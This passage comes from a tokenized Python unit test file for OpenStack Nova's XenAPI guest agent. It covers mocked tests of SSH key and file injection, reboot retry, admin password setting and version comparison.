name|'key'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_sys_meta_key_false
dedent|''
name|'def'
name|'test_get_sys_meta_key_false'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'agent'
op|'='
name|'self'
op|'.'
name|'_create_agent_with_value'
op|'('
string|'"False"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'agent'
op|'.'
name|'_get_sys_meta_key'
op|'('
name|'self'
op|'.'
name|'key'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_sys_meta_key_invalid_is_false
dedent|''
name|'def'
name|'test_get_sys_meta_key_invalid_is_false'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'agent'
op|'='
name|'self'
op|'.'
name|'_create_agent_with_value'
op|'('
string|'"invalid"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'agent'
op|'.'
name|'_get_sys_meta_key'
op|'('
name|'self'
op|'.'
name|'key'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_sys_meta_key_missing_is_false
dedent|''
name|'def'
name|'test_get_sys_meta_key_missing_is_false'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'instance'
op|'='
name|'_get_fake_instance'
op|'('
op|')'
newline|'\n'
name|'agent'
op|'='
name|'self'
op|'.'
name|'_create_agent'
op|'('
name|'instance'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'agent'
op|'.'
name|'_get_sys_meta_key'
op|'('
name|'self'
op|'.'
name|'key'
op|')'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|SkipSshFlagTestCase
dedent|''
dedent|''
name|'class'
name|'SkipSshFlagTestCase'
op|'('
name|'SysMetaKeyTestBase'
op|','
name|'AgentTestCaseBase'
op|')'
op|':'
newline|'\n'
DECL|variable|key
indent|' '
name|'key'
op|'='
string|'"image_xenapi_skip_agent_inject_ssh"'
newline|'\n'
nl|'\n'
DECL|member|test_skip_ssh_key_inject
name|'def'
name|'test_skip_ssh_key_inject'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'agent'
op|'='
name|'self'
op|'.'
name|'_create_agent_with_value'
op|'('
string|'"True"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'agent'
op|'.'
name|'_skip_ssh_key_inject'
op|'('
op|')'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|SkipFileInjectAtBootFlagTestCase
dedent|''
dedent|''
name|'class'
name|'SkipFileInjectAtBootFlagTestCase'
op|'('
name|'SysMetaKeyTestBase'
op|','
name|'AgentTestCaseBase'
op|')'
op|':'
newline|'\n'
DECL|variable|key
indent|' '
name|'key'
op|'='
string|'"image_xenapi_skip_agent_inject_files_at_boot"'
newline|'\n'
nl|'\n'
DECL|member|test_skip_inject_files_at_boot
name|'def'
name|'test_skip_inject_files_at_boot'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'agent'
op|'='
name|'self'
op|'.'
name|'_create_agent_with_value'
op|'('
string|'"True"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'agent'
op|'.'
name|'_skip_inject_files_at_boot'
op|'('
op|')'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|InjectSshTestCase
dedent|''
dedent|''
name|'class'
name|'InjectSshTestCase'
op|'('
name|'AgentTestCaseBase'
op|')'
op|':'
newline|'\n'
indent|' '
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'agent'
op|'.'
name|'XenAPIBasedAgent'
op|','
string|"'inject_file'"
op|')'
newline|'\n'
DECL|member|test_inject_ssh_key_succeeds
name|'def'
name|'test_inject_ssh_key_succeeds'
op|'('
name|'self'
op|','
name|'mock_inject_file'
op|')'
op|':'
newline|'\n'
indent|' '
name|'instance'
op|'='
name|'_get_fake_instance'
op|'('
op|')'
newline|'\n'
name|'agent'
op|'='
name|'self'
op|'.'
name|'_create_agent'
op|'('
name|'instance'
op|')'
newline|'\n'
nl|'\n'
name|'agent'
op|'.'
name|'inject_ssh_key'
op|'('
op|')'
newline|'\n'
name|'mock_inject_file'
op|'.'
name|'assert_called_once_with'
op|'('
string|'"/root/.ssh/authorized_keys"'
op|','
nl|'\n'
string|'"\\n# The following ssh key "'
nl|'\n'
string|'"was injected by Nova"'
nl|'\n'
string|'"\\nssh-rsa asdf\\n"'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'agent'
op|'.'
name|'XenAPIBasedAgent'
op|','
string|"'inject_file'"
op|')'
newline|'\n'
DECL|member|_test_inject_ssh_key_skipped
name|'def'
name|'_test_inject_ssh_key_skipped'
op|'('
name|'self'
op|','
name|'instance'
op|','
name|'mock_inject_file'
op|')'
op|':'
newline|'\n'
indent|' '
name|'agent'
op|'='
name|'self'
op|'.'
name|'_create_agent'
op|'('
name|'instance'
op|')'
newline|'\n'
nl|'\n'
comment|'# make sure its not called'
nl|'\n'
name|'agent'
op|'.'
name|'inject_ssh_key'
op|'('
op|')'
newline|'\n'
name|'mock_inject_file'
op|'.'
name|'assert_not_called'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_inject_ssh_key_skipped_no_key_data
dedent|''
name|'def'
name|'test_inject_ssh_key_skipped_no_key_data'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'instance'
op|'='
name|'_get_fake_instance'
op|'('
op|')'
newline|'\n'
name|'instance'
op|'['
string|'"key_data"'
op|']'
op|'='
name|'None'
newline|'\n'
name|'self'
op|'.'
name|'_test_inject_ssh_key_skipped'
op|'('
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_inject_ssh_key_skipped_windows
dedent|''
name|'def'
name|'test_inject_ssh_key_skipped_windows'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'instance'
op|'='
name|'_get_fake_instance'
op|'('
op|')'
newline|'\n'
name|'instance'
op|'['
string|'"os_type"'
op|']'
op|'='
string|'"windows"'
newline|'\n'
name|'self'
op|'.'
name|'_test_inject_ssh_key_skipped'
op|'('
name|'instance'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_inject_ssh_key_skipped_cloud_init_present
dedent|''
name|'def'
name|'test_inject_ssh_key_skipped_cloud_init_present'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'instance'
op|'='
name|'_get_fake_instance'
op|'('
nl|'\n'
name|'image_xenapi_skip_agent_inject_ssh'
op|'='
string|'"True"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_test_inject_ssh_key_skipped'
op|'('
name|'instance'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|FileInjectionTestCase
dedent|''
dedent|''
name|'class'
name|'FileInjectionTestCase'
op|'('
name|'AgentTestCaseBase'
op|')'
op|':'
newline|'\n'
indent|' '
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'agent'
op|'.'
name|'XenAPIBasedAgent'
op|','
string|"'_call_agent'"
op|')'
newline|'\n'
DECL|member|test_inject_file
name|'def'
name|'test_inject_file'
op|'('
name|'self'
op|','
name|'mock_call_agent'
op|')'
op|':'
newline|'\n'
indent|' '
name|'instance'
op|'='
name|'_get_fake_instance'
op|'('
op|')'
newline|'\n'
name|'agent'
op|'='
name|'self'
op|'.'
name|'_create_agent'
op|'('
name|'instance'
op|')'
newline|'\n'
nl|'\n'
name|'b64_path'
op|'='
name|'base64'
op|'.'
name|'b64encode'
op|'('
string|"'path'"
op|')'
newline|'\n'
name|'b64_contents'
op|'='
name|'base64'
op|'.'
name|'b64encode'
op|'('
string|"'contents'"
op|')'
newline|'\n'
nl|'\n'
name|'agent'
op|'.'
name|'inject_file'
op|'('
string|'"path"'
op|','
string|'"contents"'
op|')'
newline|'\n'
name|'mock_call_agent'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'inject_file'"
op|','
nl|'\n'
op|'{'
string|"'b64_contents'"
op|':'
name|'b64_contents'
op|','
nl|'\n'
string|"'b64_path'"
op|':'
name|'b64_path'
op|'}'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'agent'
op|'.'
name|'XenAPIBasedAgent'
op|','
string|"'inject_file'"
op|')'
newline|'\n'
DECL|member|test_inject_files
name|'def'
name|'test_inject_files'
op|'('
name|'self'
op|','
name|'mock_inject_file'
op|')'
op|':'
newline|'\n'
indent|' '
name|'instance'
op|'='
name|'_get_fake_instance'
op|'('
op|')'
newline|'\n'
name|'agent'
op|'='
name|'self'
op|'.'
name|'_create_agent'
op|'('
name|'instance'
op|')'
newline|'\n'
nl|'\n'
name|'files'
op|'='
op|'['
op|'('
string|'"path1"'
op|','
string|'"content1"'
op|')'
op|','
op|'('
string|'"path2"'
op|','
string|'"content2"'
op|')'
op|']'
newline|'\n'
nl|'\n'
name|'agent'
op|'.'
name|'inject_files'
op|'('
name|'files'
op|')'
newline|'\n'
name|'mock_inject_file'
op|'.'
name|'assert_has_calls'
op|'('
nl|'\n'
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
string|'"path1"'
op|','
string|'"content1"'
op|')'
op|','
name|'mock'
op|'.'
name|'call'
op|'('
string|'"path2"'
op|','
string|'"content2"'
op|')'
op|']'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'agent'
op|'.'
name|'XenAPIBasedAgent'
op|','
string|"'inject_file'"
op|')'
newline|'\n'
DECL|member|test_inject_files_skipped_when_cloud_init_installed
name|'def'
name|'test_inject_files_skipped_when_cloud_init_installed'
op|'('
name|'self'
op|','
nl|'\n'
name|'mock_inject_file'
op|')'
op|':'
newline|'\n'
indent|' '
name|'instance'
op|'='
name|'_get_fake_instance'
op|'('
nl|'\n'
name|'image_xenapi_skip_agent_inject_files_at_boot'
op|'='
string|'"True"'
op|')'
newline|'\n'
name|'agent'
op|'='
name|'self'
op|'.'
name|'_create_agent'
op|'('
name|'instance'
op|')'
newline|'\n'
nl|'\n'
name|'files'
op|'='
op|'['
op|'('
string|'"path1"'
op|','
string|'"content1"'
op|')'
op|','
op|'('
string|'"path2"'
op|','
string|'"content2"'
op|')'
op|']'
newline|'\n'
nl|'\n'
name|'agent'
op|'.'
name|'inject_files'
op|'('
name|'files'
op|')'
newline|'\n'
name|'mock_inject_file'
op|'.'
name|'assert_not_called'
op|'('
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|FakeRebootException
dedent|''
dedent|''
name|'class'
name|'FakeRebootException'
op|'('
name|'Exception'
op|')'
op|':'
newline|'\n'
DECL|variable|details
indent|' '
name|'details'
op|'='
op|'['
string|'""'
op|','
string|'""'
op|','
string|'""'
op|','
string|'"asdf REBOOT: asdf"'
op|']'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|RebootRetryTestCase
dedent|''
name|'class'
name|'RebootRetryTestCase'
op|'('
name|'AgentTestCaseBase'
op|')'
op|':'
newline|'\n'
indent|' '
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'agent'
op|','
string|"'_wait_for_new_dom_id'"
op|')'
newline|'\n'
DECL|member|test_retry_on_reboot
name|'def'
name|'test_retry_on_reboot'
op|'('
name|'self'
op|','
name|'mock_wait'
op|')'
op|':'
newline|'\n'
indent|' '
name|'mock_session'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_call_plugin
name|'def'
name|'fake_call_plugin'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'fake_call_plugin'
op|'.'
name|'called'
op|':'
newline|'\n'
indent|' '
name|'return'
op|'{'
string|'"returncode"'
op|':'
string|"'0'"
op|','
string|'"message"'
op|':'
string|'"done"'
op|'}'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'fake_call_plugin'
op|'.'
name|'called'
op|'='
name|'True'
newline|'\n'
name|'raise'
name|'FakeRebootException'
op|'('
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
name|'fake_call_plugin'
op|'.'
name|'called'
op|'='
name|'False'
newline|'\n'
name|'mock_session'
op|'.'
name|'XenAPI'
op|'.'
name|'Failure'
op|'='
name|'FakeRebootException'
newline|'\n'
name|'mock_session'
op|'.'
name|'VM'
op|'.'
name|'get_domid'
op|'.'
name|'return_value'
op|'='
string|'"fake_dom_id"'
newline|'\n'
name|'mock_session'
op|'.'
name|'call_plugin'
op|'.'
name|'side_effect'
op|'='
name|'fake_call_plugin'
newline|'\n'
nl|'\n'
name|'agent'
op|'='
name|'self'
op|'.'
name|'_create_agent'
op|'('
name|'None'
op|','
name|'mock_session'
op|')'
newline|'\n'
nl|'\n'
name|'result'
op|'='
name|'agent'
op|'.'
name|'_call_agent'
op|'('
string|'"asdf"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"done"'
op|','
name|'result'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'mock_session'
op|'.'
name|'VM'
op|'.'
name|'get_domid'
op|'.'
name|'called'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'2'
op|','
name|'mock_session'
op|'.'
name|'call_plugin'
op|'.'
name|'call_count'
op|')'
newline|'\n'
name|'mock_wait'
op|'.'
name|'assert_called_once_with'
op|'('
name|'mock_session'
op|','
name|'self'
op|'.'
name|'vm_ref'
op|','
nl|'\n'
string|'"fake_dom_id"'
op|','
string|'"asdf"'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'time'
op|','
string|"'sleep'"
op|')'
newline|'\n'
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'time'
op|','
string|"'time'"
op|')'
newline|'\n'
DECL|member|test_wait_for_new_dom_id_found
name|'def'
name|'test_wait_for_new_dom_id_found'
op|'('
name|'self'
op|','
name|'mock_time'
op|','
name|'mock_sleep'
op|')'
op|':'
newline|'\n'
indent|' '
name|'mock_session'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'mock_session'
op|'.'
name|'VM'
op|'.'
name|'get_domid'
op|'.'
name|'return_value'
op|'='
string|'"new"'
newline|'\n'
nl|'\n'
name|'agent'
op|'.'
name|'_wait_for_new_dom_id'
op|'('
name|'mock_session'
op|','
string|'"vm_ref"'
op|','
string|'"old"'
op|','
string|'"method"'
op|')'
newline|'\n'
nl|'\n'
name|'mock_session'
op|'.'
name|'VM'
op|'.'
name|'get_domid'
op|'.'
name|'assert_called_once_with'
op|'('
string|'"vm_ref"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'mock_sleep'
op|'.'
name|'called'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'time'
op|','
string|"'sleep'"
op|')'
newline|'\n'
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'time'
op|','
string|"'time'"
op|')'
newline|'\n'
DECL|member|test_wait_for_new_dom_id_after_retry
name|'def'
name|'test_wait_for_new_dom_id_after_retry'
op|'('
name|'self'
op|','
name|'mock_time'
op|','
name|'mock_sleep'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'flags'
op|'('
name|'agent_timeout'
op|'='
number|'3'
op|','
name|'group'
op|'='
string|'"xenserver"'
op|')'
newline|'\n'
name|'mock_time'
op|'.'
name|'return_value'
op|'='
number|'0'
newline|'\n'
name|'mock_session'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'old'
op|'='
number|'40'
newline|'\n'
name|'new'
op|'='
number|'42'
newline|'\n'
name|'mock_session'
op|'.'
name|'VM'
op|'.'
name|'get_domid'
op|'.'
name|'side_effect'
op|'='
op|'['
name|'old'
op|','
op|'-'
number|'1'
op|','
name|'new'
op|']'
newline|'\n'
nl|'\n'
name|'agent'
op|'.'
name|'_wait_for_new_dom_id'
op|'('
name|'mock_session'
op|','
string|'"vm_ref"'
op|','
name|'old'
op|','
string|'"method"'
op|')'
newline|'\n'
nl|'\n'
name|'mock_session'
op|'.'
name|'VM'
op|'.'
name|'get_domid'
op|'.'
name|'assert_called_with'
op|'('
string|'"vm_ref"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'3'
op|','
name|'mock_session'
op|'.'
name|'VM'
op|'.'
name|'get_domid'
op|'.'
name|'call_count'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'2'
op|','
name|'mock_sleep'
op|'.'
name|'call_count'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'time'
op|','
string|"'sleep'"
op|')'
newline|'\n'
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'time'
op|','
string|"'time'"
op|')'
newline|'\n'
DECL|member|test_wait_for_new_dom_id_timeout
name|'def'
name|'test_wait_for_new_dom_id_timeout'
op|'('
name|'self'
op|','
name|'mock_time'
op|','
name|'mock_sleep'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'flags'
op|'('
name|'agent_timeout'
op|'='
number|'3'
op|','
name|'group'
op|'='
string|'"xenserver"'
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_time
name|'def'
name|'fake_time'
op|'('
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_time'
op|'.'
name|'time'
op|'='
name|'fake_time'
op|'.'
name|'time'
op|'+'
number|'1'
newline|'\n'
name|'return'
name|'fake_time'
op|'.'
name|'time'
newline|'\n'
nl|'\n'
dedent|''
name|'fake_time'
op|'.'
name|'time'
op|'='
number|'0'
newline|'\n'
name|'mock_time'
op|'.'
name|'side_effect'
op|'='
name|'fake_time'
newline|'\n'
name|'mock_session'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'mock_session'
op|'.'
name|'VM'
op|'.'
name|'get_domid'
op|'.'
name|'return_value'
op|'='
string|'"old"'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'AgentTimeout'
op|','
nl|'\n'
name|'agent'
op|'.'
name|'_wait_for_new_dom_id'
op|','
nl|'\n'
name|'mock_session'
op|','
string|'"vm_ref"'
op|','
string|'"old"'
op|','
string|'"method"'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'4'
op|','
name|'mock_session'
op|'.'
name|'VM'
op|'.'
name|'get_domid'
op|'.'
name|'call_count'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|SetAdminPasswordTestCase
dedent|''
dedent|''
name|'class'
name|'SetAdminPasswordTestCase'
op|'('
name|'AgentTestCaseBase'
op|')'
op|':'
newline|'\n'
indent|' '
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'agent'
op|'.'
name|'XenAPIBasedAgent'
op|','
string|"'_call_agent'"
op|')'
newline|'\n'
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|'"nova.virt.xenapi.agent.SimpleDH"'
op|')'
newline|'\n'
DECL|member|test_exchange_key_with_agent
name|'def'
name|'test_exchange_key_with_agent'
op|'('
name|'self'
op|','
name|'mock_simple_dh'
op|','
name|'mock_call_agent'
op|')'
op|':'
newline|'\n'
indent|' '
name|'agent'
op|'='
name|'self'
op|'.'
name|'_create_agent'
op|'('
name|'None'
op|')'
newline|'\n'
name|'instance_mock'
op|'='
name|'mock_simple_dh'
op|'('
op|')'
newline|'\n'
name|'instance_mock'
op|'.'
name|'get_public'
op|'.'
name|'return_value'
op|'='
number|'4321'
newline|'\n'
name|'mock_call_agent'
op|'.'
name|'return_value'
op|'='
string|'"1234"'
newline|'\n'
nl|'\n'
name|'result'
op|'='
name|'agent'
op|'.'
name|'_exchange_key_with_agent'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'mock_call_agent'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'key_init'"
op|','
op|'{'
string|'"pub"'
op|':'
string|'"4321"'
op|'}'
op|','
nl|'\n'
name|'success_codes'
op|'='
op|'['
string|"'D0'"
op|']'
op|','
nl|'\n'
name|'ignore_errors'
op|'='
name|'False'
op|')'
newline|'\n'
name|'result'
op|'.'
name|'compute_shared'
op|'.'
name|'assert_called_once_with'
op|'('
number|'1234'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'agent'
op|'.'
name|'XenAPIBasedAgent'
op|','
string|"'_call_agent'"
op|')'
newline|'\n'
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'agent'
op|'.'
name|'XenAPIBasedAgent'
op|','
nl|'\n'
string|"'_save_instance_password_if_sshkey_present'"
op|')'
newline|'\n'
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'agent'
op|'.'
name|'XenAPIBasedAgent'
op|','
string|"'_exchange_key_with_agent'"
op|')'
newline|'\n'
DECL|member|test_set_admin_password_works
name|'def'
name|'test_set_admin_password_works'
op|'('
name|'self'
op|','
name|'mock_exchange'
op|','
name|'mock_save'
op|','
nl|'\n'
name|'mock_call_agent'
op|')'
op|':'
newline|'\n'
indent|' '
name|'mock_dh'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
name|'spec_set'
op|'='
name|'agent'
op|'.'
name|'SimpleDH'
op|')'
newline|'\n'
name|'mock_dh'
op|'.'
name|'encrypt'
op|'.'
name|'return_value'
op|'='
string|'"enc_pass"'
newline|'\n'
name|'mock_exchange'
op|'.'
name|'return_value'
op|'='
name|'mock_dh'
newline|'\n'
name|'agent_inst'
op|'='
name|'self'
op|'.'
name|'_create_agent'
op|'('
name|'None'
op|')'
newline|'\n'
nl|'\n'
name|'agent_inst'
op|'.'
name|'set_admin_password'
op|'('
string|'"new_pass"'
op|')'
newline|'\n'
nl|'\n'
name|'mock_dh'
op|'.'
name|'encrypt'
op|'.'
name|'assert_called_once_with'
op|'('
string|'"new_pass\\n"'
op|')'
newline|'\n'
name|'mock_call_agent'
op|'.'
name|'assert_called_once_with'
op|'('
string|"'password'"
op|','
nl|'\n'
op|'{'
string|"'enc_pass'"
op|':'
string|"'enc_pass'"
op|'}'
op|')'
newline|'\n'
name|'mock_save'
op|'.'
name|'assert_called_once_with'
op|'('
string|'"new_pass"'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'agent'
op|'.'
name|'XenAPIBasedAgent'
op|','
string|"'_add_instance_fault'"
op|')'
newline|'\n'
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'agent'
op|'.'
name|'XenAPIBasedAgent'
op|','
string|"'_exchange_key_with_agent'"
op|')'
newline|'\n'
DECL|member|test_set_admin_password_silently_fails
name|'def'
name|'test_set_admin_password_silently_fails'
op|'('
name|'self'
op|','
name|'mock_exchange'
op|','
nl|'\n'
name|'mock_add_fault'
op|')'
op|':'
newline|'\n'
indent|' '
name|'error'
op|'='
name|'exception'
op|'.'
name|'AgentTimeout'
op|'('
name|'method'
op|'='
string|'"fake"'
op|')'
newline|'\n'
name|'mock_exchange'
op|'.'
name|'side_effect'
op|'='
name|'error'
newline|'\n'
name|'agent_inst'
op|'='
name|'self'
op|'.'
name|'_create_agent'
op|'('
name|'None'
op|')'
newline|'\n'
nl|'\n'
name|'agent_inst'
op|'.'
name|'set_admin_password'
op|'('
string|'"new_pass"'
op|')'
newline|'\n'
nl|'\n'
name|'mock_add_fault'
op|'.'
name|'assert_called_once_with'
op|'('
name|'error'
op|','
name|'mock'
op|'.'
name|'ANY'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|UpgradeRequiredTestCase
dedent|''
dedent|''
name|'class'
name|'UpgradeRequiredTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|test_less_than
indent|' '
name|'def'
name|'test_less_than'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'agent'
op|'.'
name|'is_upgrade_required'
op|'('
string|"'1.2.3.4'"
op|','
string|"'1.2.3.5'"
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_greater_than
dedent|''
name|'def'
name|'test_greater_than'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'agent'
op|'.'
name|'is_upgrade_required'
op|'('
string|"'1.2.3.5'"
op|','
string|"'1.2.3.4'"
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_equal
dedent|''
name|'def'
name|'test_equal'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'agent'
op|'.'
name|'is_upgrade_required'
op|'('
string|"'1.2.3.4'"
op|','
string|"'1.2.3.4'"
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_non_lexical
dedent|''
name|'def'
name|'test_non_lexical'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'agent'
op|'.'
name|'is_upgrade_required'
op|'('
string|"'1.2.3.10'"
op|','
string|"'1.2.3.4'"
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_length
dedent|''
name|'def'
name|'test_length'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'agent'
op|'.'
name|'is_upgrade_required'
op|'('
string|"'1.2.3'"
op|','
string|"'1.2.3.4'"
op|')'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'uuid'
op|','
string|'"uuid4"'
op|')'
newline|'\n'
DECL|class|CallAgentTestCase
name|'class'
name|'CallAgentTestCase'
op|'('
name|'AgentTestCaseBase'
op|')'
op|':'
newline|'\n'
DECL|member|test_call_agent_success
indent|' '
name|'def'
name|'test_call_agent_success'
op|'('
name|'self'
op|','
name|'mock_uuid'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
op|')'
newline|'\n'
name|'instance'
op|'='
op|'{'
string|'"uuid"'
op|':'
string|'"fake"'
op|'}'
newline|'\n'
name|'addl_args'
op|'='
op|'{'
string|'"foo"'
op|':'
string|'"bar"'
op|'}'
newline|'\n'
nl|'\n'
name|'session'
op|'.'
name|'VM'
op|'.'
name|'get_domid'
op|'.'
name|'return_value'
op|'='
string|"'42'"
newline|'\n'
name|'mock_uuid'
op|'.'
name|'return_value'
op|'='
number|'1'
newline|'\n'
name|'session'
op|'.'
name|'call_plugin'
op|'.'
name|'return_value'
op|'='
op|'{'
string|"'returncode'"
op|':'
string|"'4'"
op|','
nl|'\n'
string|"'message'"
op|':'
string|'"asdf\\\\r\\\\n"'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"asdf"'
op|','
nl|'\n'
name|'agent'
op|'.'
name|'_call_agent'
op|'('
name|'session'
op|','
name|'instance'
op|','
string|'"vm_ref"'
op|','
nl|'\n'
string|'"method"'
op|','
name|'addl_args'
op|','
name|'timeout'
op|'='
number|'300'
op|','
nl|'\n'
name|'success_codes'
op|'='
op|'['
string|"'0'"
op|','
string|"'4'"
op|']'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'expected_args'
op|'='
op|'{'
nl|'\n'
string|"'id'"
op|':'
string|"'1'"
op|','
nl|'\n'
string|"'dom_id'"
op|':'
string|"'42'"
op|','
nl|'\n'
string|"'timeout'"
op|':'
string|"'300'"
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'expected_args'
op|'.'
name|'update'
op|'('
name|'addl_args'
op|')'
newline|'\n'
name|'session'
op|'.'
name|'VM'
op|'.'
name|'get_domid'
op|'.'
name|'assert_called_once_with'
op|'('
string|'"vm_ref"'
op|')'
newline|'\n'
name|'session'
op|'.'
name|'call_plugin'
op|'.'
name|'assert_called_once_with'
op|'('
string|'"agent"'
op|','
string|'"method"'
op|','
nl|'\n'
name|'expected_args'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_call_agent_setup
dedent|''
name|'def'
name|'_call_agent_setup'
op|'('
name|'self'
op|','
name|'session'
op|','
name|'mock_uuid'
op|','
nl|'\n'
name|'returncode'
op|'='
string|"'0'"
op|','
name|'success_codes'
op|'='
name|'None'
op|','
nl|'\n'
name|'exception'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
name|'session'
op|'.'
name|'XenAPI'
op|'.'
name|'Failure'
op|'='
